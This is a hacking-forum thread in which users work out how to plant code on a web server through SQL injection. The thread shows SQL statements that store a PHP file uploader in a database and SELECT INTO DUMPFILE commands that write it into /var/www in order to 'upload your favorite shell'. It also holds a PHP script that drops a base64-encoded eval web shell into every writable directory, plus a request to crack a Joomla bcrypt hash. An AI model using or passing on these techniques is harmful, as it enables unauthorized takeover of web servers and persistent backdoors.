Jump to content

MySQL problem with inserting PHP code into DB


Recommended Posts

Posted

Hi to all !

I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed..

This htm form successfully inserted into DB via SQLmap

insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<head>Upload File</head>
<body>
<<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');

but this give me SQL syntax error in line 1 every time, when try to insert into DB:

insert into user_upload values ('
<?php
$target_path = '/var/www/';

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Where is the problem.?

I forget to tell that DB tables are allready created into DB exploitdb.

Posted

You hvae a quoted string which you are breaking out of with quotes in the lines you are injecting, try changing all the quotes in the string to double quotes and the outside ones to single.

Sounds like an interesting vulnerability where you can pull a contents from a database and get them executed.

Posted

Yeah its single quotes, but why then first form (htm form) inserted successfully into db, and second give me SQL error.? Can you change the quotes, and then try to insert into db table again.?

Posted

The way SQL works is that when you want to put a string in a column, you say:

insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.

Posted

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

Posted

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

So in fact if i change "blacklighted text" into " " will be OK?

insert into user_upload values ('
<?php
$target_path = "/var/www/";

$target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); 

if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
    echo "The file ".  basename( $_FILES["uploadedfile"]["name"]). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');
Posted

That looks ok, try it and see.

What are you exploiting, I'm curious about what vulnerability pulls code from a database and executes it

Posted

Yeah SQL code inserted into DB table, and executes into evil php uploader.

Grab the content from SQL table and dump to .php file using these command:

select * into dumpfile '/var/www/uploadform.php' from userform;

select * into dumpfile '/var/www/uploader.php' from user_upload;


After that sumply execute uploadform.php and upload your favorite shell into host. Thanks for everything guys. :)

Posted

That makes sense, I was thinking it was executing from the database.

If you've got file write permissions you've probably also got read permissions if you've not checked that already.

Posted

Or have local file inclusion.

I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads, they are writable when the rest isn't

Posted

Which distro uses /var/www for this though? On my Gentoo's Apache install the root folder is /var/www/<hostname>/htdocs for instance.

Posted

Ill provide some of my exciting automation :-p

this little snipp will recursively scan directorys for writable permissions and then write a small shell...

If you have php execution, phpinfo(); then try eval(codebelow);

carefule, this may write a few thousand shells to ur hard drive :-)

chdir('../');

$path = realpath(getcwd());

$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);

foreach($objects as $name => $object){

        if (is_dir($name)) {

                if (is_writable($name))  {

                        echo $name . ' ';

                        file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));

                }

        }

}

Posted

^^ Thanks for script. Its very usefull for finding writable folders. I dont want to open a new thread, did someone know why this Joomla hash is very long compared with other hash in DB

$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB.

How to crack this one.?

Posted

Fields are separated by the $ character.

2y means "The most secure version of Blowfish"

10 is the amount of blowfish iterations.

The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...